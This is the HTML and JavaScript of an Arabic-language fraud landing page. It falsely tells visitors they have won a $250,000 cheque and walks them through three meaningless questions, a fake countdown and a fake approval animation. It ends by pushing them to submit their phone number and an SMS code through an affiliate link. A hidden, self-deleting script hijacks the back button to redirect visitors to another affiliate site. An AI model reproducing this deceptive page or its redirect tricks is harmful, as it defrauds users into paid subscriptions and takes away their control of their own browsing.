<!DOCTYPE html>




<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta content="user-scalable=false; initial-scale=1.0; maximum-scale=1.0" name="viewport">
    <title>الف مبروك سجل برقمك هنا</title>
    <link rel="icon" href="https://b.top4top.io/p_3176txv9h1.png" type="image/x-icon">
    <META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
    <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
    <META HTTP-EQUIV="Expires" CONTENT="-1">


    <style>
        html,
        body,
        div,
        span,
        applet,
        object,
        iframe,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6,
        p,
        blockquote,
        pre,
        a,
        abbr,
        acronym,
        address,
        big,
        cite,
        code,
        del,
        dfn,
        em,
        font,
        img,
        ins,
        kbd,
        q,
        s,
        samp,
        small,
        strike,
        strong,
        sub,
        sup,
        tt,
        var,
        b,
        u,
        i,
        center,
        dl,
        dt,
        dd,
        ol,
        ul,
        li,
        fieldset,
        form,
        label,
        legend,
        table,
        caption,
        tbody,
        tfoot,
        thead,
        tr,
        th,
        td {
            margin: 0;
            padding: 0;
            border: 0;
            font-family: 'Helvetica', Tahoma;
            outline: 0;
            font-size: 100%;
            background: transparent;
        }

        ol,
        ul {
            list-style: none;
        }

        blockquote,
        q {
            quotes: none;
        }

        :focus {
            outline: 0;
        }

        ins {
            text-decoration: none;
        }

        del {
            text-decoration: line-through;
        }

        table {
            border-collapse: collapse;
            border-spacing: 0;
        }

        body {
            font: 100% "Helvetica", Tahoma, Arial, sans-serif;
            width: 100%;
            background: none scroll 0 0 #21454c;
        }

        a {
            color: blue;
            outline: 0 none;
            text-decoration: underline;
        }

        a:hover {
            text-decoration: none;
        }

        p {
            margin: 0 0 18px
        }

        img {
            border: none;
        }

        input {
            vertical-align: middle;
        }

        html {
            overflow-y: scroll;
        }

        .clearfix:after {
            content: ".";
            display: block;
            clear: both;
            visibility: hidden;
            line-height: 0;
            height: 0;
        }

        .clearfix {
            display: inline-block;
        }

        html[xmlns] .clearfix {
            display: block;
        }

        * html .clearfix {
            height: 1%;
        }

        .all-wrap {
            max-width: 640px;
            margin: 0 auto;
            position: relative;
        }

        .header {
            text-align: center;
        }

        .header img {
            max-width: 100%;
        }

        #content {
            position: absolute;
            top: 0;
            width: 100%;
            left: 0;
            padding: 32% 0 0 0;
            font-size: 100%;
        }

        #content.active {
            padding: 16% 0 0 0;
            -webkit-transition-property: padding;
            -webkit-transition-duration: 0.5s;
            -webkit-transition-timing-function: ease;
            -moz-transition-property: padding;
            -moz-transition-duration: 0.5s;
            -moz-transition-timing-function: ease;
            -o-transition-property: padding;
            -o-transition-duration: 0.5s;
            -o-transition-timing-function: ease;
            transition-property: padding;
            transition-duration: 0.5s;
            transition-timing-function: ease;
        }

        .content-top-block {
            background: url(https://lh5.googleusercontent.com/proxy/0MmNLjwqqFJdut3U5GMLU_bNmowQ92F4VPZN0jLoe7f261erhM9YQC0py4jPhG4ZPy8=s0-d) no-repeat scroll bottom center transparent;
            padding: 16% 0 0 0;
            background-size: 100%;
        }

        .all-content {
            background: none scroll 0 0 #21454c;
            background: -moz-linear-gradient(top, #21454c 0%, #3d7f8d 100%);
            background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #21454c), color-stop(100%, #3d7f8d));
            background: -webkit-linear-gradient(top, #21454c 0%, #3d7f8d 100%);
            background: -o-linear-gradient(top, #21454c 0%, #3d7f8d 100%);
            background: -ms-linear-gradient(top, #21454c 0%, #3d7f8d 100%);
            background: linear-gradient(to bottom, #21454c 0%, #3d7f8d 100%);
            padding: 4% 5%;
            font-size: 100%;
        }

        .nice-slogan {
            color: #ffd00d;
            font-size: 1.5em;
            font-weight: bold;
            text-align: center;
        }

        .txt-information {
            color: #ffffff;
            text-align: right;
            padding: 22px 0;
            border-bottom: 1px solid #3d7f8d;
            line-height: 20px;
            font-size: 0.8em;
            font-weight: normal;
        }

        .txt-information span {
            color: #42f8ff;
            font-size: 1em;
        }

        .question1 {
            color: #ffffff;
            font-size: 1em;
            font-weight: normal;
            padding: 20px 0 0 0;
        }

        .question1 span {
            color: #ffd801;
            font-size: 1.3em;
            font-weight: bold;
        }

        .buttons {
            height: 70px;
            margin: 0 0 10px;
            padding: 15px 0 0;
        }

        #btn-no,
        #btn-no-second,
        #btn-no-third {
            width: 45%;
            height: 65px;
            display: inline-block;
            float: left;
            background: none scroll 0 0 #cec7cb;
            background: -moz-linear-gradient(top, #e0d8dc 0%, #c6bfc2 100%);
            background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #e0d8dc), color-stop(100%, #c6bfc2));
            background: -webkit-linear-gradient(top, #e0d8dc 0%, #c6bfc2 100%);
            background: -o-linear-gradient(top, #e0d8dc 0%, #c6bfc2 100%);
            background: -ms-linear-gradient(top, #e0d8dc 0%, #c6bfc2 100%);
            background: linear-gradient(to bottom, #e0d8dc 0%, #c6bfc2 100%);
            border: 2px solid #1f4249;
            -moz-border-radius: 5px;
            -webkit-border-radius: 5px;
            border-radius: 5px;
            color: #4c4c4c;
            line-height: 66px;
            font-size: 2em;
            text-align: center;
            font-weight: bold;
            text-decoration: none;
            cursor: pointer;
        }

        #btn-no:hover,
        #btn-no-second:hover,
        #btn-no-third:hover {
            opacity: 0.9;
        }

        #btn-yes,
        #btn-yes-second,
        #btn-yes-third {
            width: 45%;
            height: 65px;
            display: inline-block;
            float: right;
            background: none scroll 0 0 #7fc827;
            background: -moz-linear-gradient(top, #7fc827 0%, #70b122 100%);
            background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #7fc827), color-stop(100%, #70b122));
            background: -webkit-linear-gradient(top, #7fc827 0%, #70b122 100%);
            background: -o-linear-gradient(top, #7fc827 0%, #70b122 100%);
            background: -ms-linear-gradient(top, #7fc827 0%, #70b122 100%);
            background: linear-gradient(to bottom, #7fc827 0%, #70b122 100%);
            border: 2px solid #1f4249;
            -moz-border-radius: 5px;
            -webkit-border-radius: 5px;
            border-radius: 5px;
            color: #4c4c4c;
            line-height: 66px;
            font-size: 2em;
            text-align: center;
            font-weight: bold;
            text-decoration: none;
            cursor: pointer;
        }

        #btn-yes:hover,
        #btn-yes-second:hover,
        #btn-yes-third:hover {
            opacity: 0.9;
        }

        #second-step {}

        #rules {
            opacity: 0;
        }

        h1#access {
            opacity: 0;
            color: white;
            font-size: 1.2em;
            padding: 10px 0 20px;
            text-align: center;
        }

        h1.rules-title {
            color: #ffd00d;
            font-size: 1.4em;
            padding: 10px 0 20px;
            text-align: center;
            font-weight: normal;
        }

        .rules-block ul li.first {
            background: url(https://lh6.googleusercontent.com/proxy/qOlTorl0OBC-BEhT_OIjIL32OtdnltlKhOsmxT2qEdizwOsfK8Yig-rnbz31RxUIc80=s0-d) no-repeat scroll left top transparent;
        }

        .rules-block ul li.second {
            background: url(https://lh5.googleusercontent.com/proxy/RTCAcSEyJwQ2jZXbJltW4Y0M4opaz8edug_mPGgk4PFafc71qpBfvBBO7gQ5eZbSwPc=s0-d) no-repeat scroll left top transparent;
        }

        .rules-block ul li.third {
            background: url(https://lh3.googleusercontent.com/proxy/0PAczyaK8TosOZrb7vzLHaUylO-f5rE-zDKhzIPhepmgvqG-oUfQ0iaH1ytyxPDVu7k=s0-d) no-repeat scroll left top transparent;
        }

        .rules-block ul li span {
            color: #FFFFFF;
            display: block;
            font-size: 0.8em;
            height: 55px;
            padding-left: 34px;
        }

        .i-agree {
            color: #ffd00d;
            font-size: 0.7em;
            text-align: center;
        }

        a#agree {
            border: 2px solid #1f4249;
            display: block;
            /*height: 66px;*/
            padding-top: 15px;
            padding-bottom: 15px;
            margin: 30px auto 0;
            width: 85%;
            background: url(images/btn-bg.jpg) repeat-x scroll 0 0 #77bd25;
            -moz-border-radius: 5px;
            -webkit-border-radius: 5px;
            border-radius: 5px;
            color: #294508;
            font-size: 3em;
            line-height: 33px;
            font-weight: bold;
            text-decoration: none;
            font-family: "Helvetica", Tahoma;
            cursor: pointer;
        }

        a#agree:hover {
            opacity: 0.9;
        }

        /*Check transition*/

        .container-check ul li {
            margin: 0;
            background: url(https://lh4.googleusercontent.com/proxy/RzzBdR79x_Spm0U2OAA0lOsSQ5Eg6MwDZqklDzF8lN7N8_vktYo63yqTLqpD-6oh87c=s0-d) no-repeat scroll top left transparent;
            opacity: 0;
        }

        .container-check ul li span {
            height: 50px;
            display: block;
            padding: 0 0 0 31px;
            text-align: left;
            line-height: 20px;
            color: #ffffff;
            font-size: 1em;
        }

        .container-check ul li#first.alpha {
            opacity: 1;
            -webkit-transition: opacity 0.5s ease;
            -moz-transition: opacity 0.5s ease;
            transition: opacity 0.5s ease;
        }

        .container-check ul li#second.alpha {
            opacity: 1;
            -webkit-transition: opacity 0.5s ease;
            -moz-transition: opacity 0.5s ease;
            transition: opacity 0.5s ease;
        }

        .container-check ul li#third.alpha {
            opacity: 1;
            -webkit-transition: opacity 0.5s ease;
            -moz-transition: opacity 0.5s ease;
            transition: opacity 0.5s ease;
        }

        .container-check ul li#fourth.alpha {
            opacity: 1;
            -webkit-transition: opacity 0.5s ease;
            -moz-transition: opacity 0.5s ease;
            transition: opacity 0.5s ease;
        }

        #rules.alpha {
            opacity: 1;
            -webkit-transition: opacity 0.5s ease;
            -moz-transition: opacity 0.5s ease;
            transition: opacity 0.5s ease;
        }

        #loading {
            display: block;
            margin: 0 auto;
            position: relative;
            top: 28px;
        }

        /*End Check transition*/
    </style>
    <link rel="openid.server" href="https://www.blogger.com/openid-server.g" />
    <audio autoplay="autoplay" hidden="hidden"> <source src="""> </source></audio>
    <link rel="me" href="" />
    <link rel="me" href="https://www.blogger.com/profile/02926554698227877259" />
    <link rel="me" href="https://www.blogger.com/profile/02926554698227877259" />
    <link rel="me" href="https://www.blogger.com/profile/02926554698227877259" />
    <link rel="me" href="https://www.blogger.com/profile/04919858400064940337" />
    <link rel="me" href="https://www.blogger.com/profile/04919858400064940337" />
    <link rel="me" href="https://www.blogger.com/profile/04919858400064940337" />
    <link rel="me" href="https://www.blogger.com/profile/04919858400064940337" />
    <link rel="me" href="https://www.blogger.com/profile/04919858400064940337" />
    <link rel="me" href="https://www.blogger.com/profile/06850564226633341155" />
    <link rel="me" href="https://www.blogger.com/profile/06850564226633341155" />
    <link rel="me" href="https://www.blogger.com/profile/06850564226633341155" />
    <link rel="me" href="https://www.blogger.com/profile/11532184821192652650" />
    <link rel="me" href="https://www.blogger.com/profile/16715023734615933854" />
    <link rel="me" href="https://www.blogger.com/profile/16715023734615933854" />
    <link rel="me" href="https://www.blogger.com/profile/16715023734615933854" />
    <link rel="me" href="https://www.blogger.com/profile/12288467496350280244" />
    <!-- -->
    <style type="text/css">
        @import url(//www.blogger.com/static/v1/v-css/navbar/3334278262-classic.css);
        div.b-mobile {
            display: none;
        }
    </style>

    <link rel="me" href="https://www.blogger.com/profile/12288467496350280244" />
    <link rel="me" href="https://www.blogger.com/profile/04094194980076362251" />
    <link rel="me" href="https://www.blogger.com/profile/08308067588335522253" />
    <link rel="me" href="https://draft.blogger.com/profile/08308067588335522253" />
    <link rel="me" href="https://www.blogger.com/profile/08308067588335522253" />
    <link rel="me" href="https://www.blogger.com/profile/08308067588335522253" />
    <link rel="me" href="https://www.blogger.com/profile/08308067588335522253" />
    <link rel="me" href="https://www.blogger.com/profile/08308067588335522253" />
    <link rel="me" href="https://www.blogger.com/profile/08308067588335522253" />
    <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109' />
    <meta name='google-adsense-platform-domain' content='blogspot.com' />
    <link rel="me" href="https://www.blogger.com/profile/14514583709859630585" />
    <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109' />
    <meta name='google-adsense-platform-domain' content='blogspot.com' />
    <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109' />
    <meta name='google-adsense-platform-domain' content='blogspot.com' />
    <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109' />
    <meta name='google-adsense-platform-domain' content='blogspot.com' />
    <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109' />
    <meta name='google-adsense-platform-domain' content='blogspot.com' />
    <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109' />
    <meta name='google-adsense-platform-domain' content='blogspot.com' />
    <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109' />
    <meta name='google-adsense-platform-domain' content='blogspot.com' />
    <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109' />
    <meta name='google-adsense-platform-domain' content='blogspot.com' />
    <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109' />
    <meta name='google-adsense-platform-domain' content='blogspot.com' />
    <link rel="me" href="https://www.blogger.com/profile/14514583709859630585" />
    <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109' />
    <meta name='google-adsense-platform-domain' content='blogspot.com' />
    <link rel="me" href="https://www.blogger.com/profile/14514583709859630585" />
    <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109' />
    <meta name='google-adsense-platform-domain' content='blogspot.com' />
    <link rel="me" href="https://www.blogger.com/profile/14514583709859630585" />
    <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109' />
    <meta name='google-adsense-platform-domain' content='blogspot.com' />
    <link rel="me" href="https://www.blogger.com/profile/14514583709859630585" />
    <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109' />
    <meta name='google-adsense-platform-domain' content='blogspot.com' />
</head>



</div>

<body style="zoom: 1;">
    <script type="text/javascript">
        function setAttributeOnload(object, attribute, val) {
            if (window.addEventListener) {
                window.addEventListener('load',
                    function() {
                        object[attribute] = val;
                    }, false);
            } else {
                window.attachEvent('onload', function() {
                    object[attribute] = val;
                });
            }
        }
    </script>







    <div class="all-wrap">
        <div class="header">
            <img src="https://b.top4top.io/p_317680qyt1.jpg" alt="">
        </div>
        <div id="content">

            <div class="content-top-block"></div>
            <div class="all-content">
                <h1 class="nice-slogan">ألف مبروووك لقد ربحت شيك بقيمة 250.000 دولار من مسابقة الحلم جاوب على الأسئلة بالأسفل للإتصال بك وتسليمك الشيك
                </h1>

                <center>



                </center>

                <div class="txt-information">
                    سارع بالتسجيل في الموقع <span>متاح لك 3 فرص فقط.</span> <br> انت محظوظ جدا : التسجيل في الموقع متاح لمدة <span id="javascript_countdown_time"><span></span></span>.<br> يجب عليك الاجابة علي ثلاث اسئلة فقط حتي يتاح لك التسجيل
                </div>
                <div id="first-step" style="" align="right">
                    <div class="question1"><span>السؤال الاول:</span> هل لديك وظيفة ودخل ثابت ؟</div>
                    <div class="buttons">
                        <a id="btn-no" href="">لا</a>
                        <a id="btn-yes" href="">نعم</a>
                        <div>
                        </div>
                    </div>
                </div>

                <div id="second-step" style="display:none;">
                    <div class="question1" align="right"><span>السؤال الثاني : </span>هل فزت بجائزة مالية قبل ذلك ؟</div>
                    <div class="buttons">
                        <a id="btn-no-second">لا</a>
                        <a id="btn-yes-second">نعم</a>

                    </div>
                </div>

                <div id="third-step" style="display:none;">
                    <div class="question1" align="right"><span>السؤال الثالث : </span>ما هو جنسك ؟</div>
                    <div class="buttons">
                        <a id="btn-no-third">أنثى</a>
                        <a id="btn-yes-third">ذكر</a>

                    </div>
                </div>
                <div id="fourth-step" style="display:none;">
                    <div class="container-check">
                        <img id="loading" src="https://www.fckya.com.es/landing/dt/images/loading.gif" alt="">
                        <h1 id="access">مبروك ! انت الآن مؤهل للتسجيل في الموقع واستلام الشيك</h1>
                        <ul>

                            <li id="first"><span>شكرا لك ! جاري تقييم اجاباتك</span></li>
                            <li id="second"><span>لقد قمنا بفحص جميع البيانات</span></li>
                            <li id="third"><span>تم الموافقة علي التسجيل</span></li>
                            <li id="fourth"><span>برجاء اتباع أخر خطوه !</span></li>
                        </ul>
                    </div>
                    <div id="rules">
                        <div class="rules-block">
                            <h1 class="rules-title">اضغط موافق وسجل برقم تيلفونك ستصلك رسالة بها رمز قم بكتابه الرمز بالموقع لتأكد الإتصال بك وتسليمك الشيك </h1>
                        </div>
                        <div class="i-agree">
                            <a id="agree" href="https://aff.kalawyoffers.xyz/?utm_medium=f4e0038d7ce9e7dcfcfdc131df932af2345e00f0&utm_campaign=smartall">"موافق"</a>

                        </div>

                    </div>
                </div>
                <center>

                </center>
            </div>
        </div>

    </div>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <script type="text/javascript">
        $(function() {
            $('#btn-yes').click(function() {
                step2();
                return false;
            });
            $('#btn-no').click(function() {
                step2();
                return false;
            });
            $('#btn-yes-second').click(function() {
                step3();
                return false;
            });
            $('#btn-no-second').click(function() {
                step3();
                return false;
            });
            $('#btn-yes-third').click(function() {
                super_show();
                return false;
            });
            $('#btn-no-third').click(function() {
                super_show();
                return false;
            });
        });

        function step2() {
            $('#first-step').hide();
            $('#second-step').show();
        }

        function step3() {
            $('#second-step').hide();
            $('#third-step').show();
        }

        function super_show() {
            $('#third-step').hide();
            $('#fourth-step').show();
            document.getElementById('content').className += 'active';
            setTimeout("document.getElementById('first').className +='alpha'", 1000);
            setTimeout("document.getElementById('second').className +='alpha'", 2000);
            setTimeout("document.getElementById('third').className +='alpha'", 3000);
            setTimeout("document.getElementById('fourth').className +='alpha'", 4000);
            setTimeout("document.getElementById('rules').className +='alpha'", 4500);
            setTimeout("document.getElementById('loading').style.display='none'", 4000);
            setTimeout("document.getElementById('access').style.opacity='1'", 4000);

        }
    </script>

    <script>
        /* TIMER */
        var javascript_countdown = function() {
            var time_left = 10; //number of seconds for countdown
            var keep_counting = 1;
            var no_time_left_message = 'few seconds';

            function countdown() {
                if (time_left < 2) {
                    keep_counting = 0;
                }
                time_left = time_left - 1;
            }

            function add_leading_zero(n) {
                if (n.toString().length < 2) {
                    return '0' + n;
                } else {
                    return n;
                }
            }

            function format_output() {
                var hours, minutes, seconds;
                seconds = time_left % 60;
                minutes = Math.floor(time_left / 60) % 60;
                hours = Math.floor(time_left / 3600);
                seconds = add_leading_zero(seconds);
                minutes = add_leading_zero(minutes);
                hours = add_leading_zero(hours);
                return seconds + ' : ' + minutes;
            }

            function show_time_left() {
                document.getElementById('javascript_countdown_time').innerHTML = '<span>' + format_output() + '</span>'; //time_left;
            }

            function no_time_left() {
                document.getElementById('javascript_countdown_time').innerHTML = no_time_left_message;
            }
            return {
                count: function() {
                    countdown();
                    show_time_left();
                },
                timer: function() {
                    javascript_countdown.count();
                    if (keep_counting) {
                        setTimeout("javascript_countdown.timer();", 1000);
                    } else {
                        no_time_left();
                    }
                },
                init: function(n) {
                    time_left = n;
                    javascript_countdown.timer();
                }
            };
        }();
        javascript_countdown.init(290);
        /* TIMER END */
    </script>

    <div id="bnh76e2" style="display:none">
        <script>
            var entry_pop = false,
                popin_msg;

            function setupPopinMsg() {
                popin_msg = "hi";
            }
            var backBtn_redir_link = "http://www.greatmobilegames.mobi/?sl=2743930-a7be3&data1=Track1&data2=Track2&tag={External_ID_from_traffic_source}&website={subID}&placement={sub_subID}",
                backBtn_redirect_active = true,
                tokens_to_redirect = [];
            var tokens = [];
            var animatedCTA = true;
            var isOperaMini, bnh76e2 = setInterval(function() {
                    if (/loaded|complete/.test(document.readyState)) {
                        clearInterval(bnh76e2);
                        getURLPars();
                        fill_tokens();
                        setupPopinMsg();
                        entry_pop && alert(popin_msg);
                        setTimeout(function() {
                            downFonts()
                        }, 150);
                        document.addEventListener("scroll", showAll);
                        setTimeout(function() {
                            [].slice.call(document.querySelectorAll("#thumbs>div>div>div:nth-of-type(2)")).forEach(function(a, b) {
                                a.style.display = "block"
                            });
                            [].slice.call(document.querySelectorAll("#thumbs h1")).forEach(function(a, b) {
                                a.className = "live"
                            });
                            loadTImgs()
                        }, 250);
                        animatedCTA && (shakeEl = document.querySelectorAll("#thumbs a i"), shake());
                        backBtn_redirect_active && activate_BB();
                        if (isOperaMini = "[object OperaMini]" === Object.prototype.toString.call(window.operamini)) elById("emptyPadding").style.display = "none", elById("scrollit").style.display = "none", [].slice.call(document.querySelectorAll("#thumbs>div>div>div:nth-of-type(2) p span")).forEach(function(a, b) {
                            a.className = "sOmini"
                        }), [].slice.call(document.querySelectorAll("#thumbs>div>div>div:nth-of-type(2) u")).forEach(function(a, b) {
                            a.style.display = "none"
                        }), [].slice.call(document.getElementsByClassName("nShow")).forEach(function(a, b) {
                            a.style.display = "block"
                        });
                        setTimeout(function() {
                            if ("undefined" != typeof elById("pixels-box") && null !== elById("pixels-box")) {
                                var a = document.createElement("script");
                                a.type = "text/javascript";
                                a.innerHTML = elById("pixels-box").innerHTML;
                                document.getElementsByTagName("head")[0].appendChild(a);
                                document.getElementsByTagName("body")[0].removeChild(elById("pixels-box"))
                            }
                        }, 400);
                        document.addEventListener("touchstart", function() {}, !0);
                        "undefined" != typeof elById("bnh76e2") && null !== elById("bnh76e2") && document.getElementsByTagName("body")[0].removeChild(elById("bnh76e2"))
                    }
                }, 10),
                lock = !1,
                showAll = function(a) {
                    lock || (lock = !0, [].slice.call(document.getElementsByClassName("nShow")).forEach(function(a, c) {
                        a.style.display = "block"
                    }), elById("scrollit").style.display = "none", elById("emptyPadding").style.display = "none", lock = !1)
                },
                shakeEl;

            function shake() {
                [].slice.call(shakeEl).forEach(function(a, b) {
                    a.parentElement.className += " pulse";
                    setTimeout(function() {
                        a.className += " animate"
                    }, 300);
                    setTimeout(function() {
                        a.parentElement.className = ""
                    }, 1700);
                    setTimeout(function() {
                        a.className = ""
                    }, 2E3)
                });
                setTimeout(shake, 3600)
            }

            function loadTImgs() {
                [].slice.call(document.querySelectorAll("#thumbs>div>div>div:first-of-type>div")).forEach(function(a, b) {
                    (a.currentStyle || window.getComputedStyle(a, !1)).backgroundImage.slice(4, -1).replace(/"/g, "")
                })
            }

            function fill_tokens() {
                0 != tokens.length && [].slice.call(tokens).forEach(function(a, b) {
                    window[a[0]] = urlParams[a[0]];
                    if ("Unknown" == window[a[0]] || "unknown" == window[a[0]] || "Generic" == window[a[0]] || "generic" == window[a[0]] || void 0 == window[a[0]]) window[a[0]] = a[1];
                    setToken(a[0], window[a[0]])
                })
            }

            function setToken(a, b) {
                0 != document.getElementsByClassName(a).length && null !== b && [].slice.call(document.getElementsByClassName(a)).forEach(function(a, d) {
                    a.innerHTML = b
                })
            }

            function getURLPars() {
                var a, b = /\+/g,
                    c = /([^&=]+)=?([^&]*)/g,
                    d = window.location.search.substring(1);
                for (urlParams = {}; a = c.exec(d);) urlParams[decodeURIComponent(a[1].replace(b, " "))] = decodeURIComponent(a[2].replace(b, " "))
            }

            function downFonts() {
                WebFontConfig = {
                    google: {
                        families: ["Roboto:400,700,900,100,300:latin"]
                    }
                };
                var a = document.createElement("script");
                a.src = ("https:" == document.location.protocol ? "https" : "http") + "://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js";
                a.type = "text/javascript";
                a.async = "true";
                var b = document.body.lastChild;
                b.parentNode.insertBefore(a, b.nextSibling)
            }

            function elById(a) {
                return document.getElementById(a)
            }

            function elByCl(a, b) {
                return document.getElementsByClassName(a)[b]
            }

            function bringIn(a, b) {
                setTimeout(function() {
                    elById(a).style.display = "block"
                }, b)
            }

            function hideOut(a, b) {
                setTimeout(function() {
                    elById(a).style.display = "none"
                }, b)
            }

            function activate_BB() {
                var a = window.location.search,
                    b = tokens_to_redirect,
                    c = "";
                if (b[0])
                    for (urlParams[b[0]] && (c = c + "?" + b[0] + "=" + urlParams[b[0]]), i = 1; i < b.length; i++) urlParams[b[i]] && (c = c + "&" + b[i] + "=" + urlParams[b[i]]);
                history.replaceState(null, document.title, location.pathname + a + "#!/backbtn");
                history.pushState(null, document.title, location.pathname + a);
                window.addEventListener("popstate", function() {
                    "#!/backbtn" === location.hash && setTimeout(function() {
                        location.replace(backBtn_redir_link + c)
                    }, 0)
                }, !1)
            };
        </script>
    </div>
    <script></script>

</body>

</html>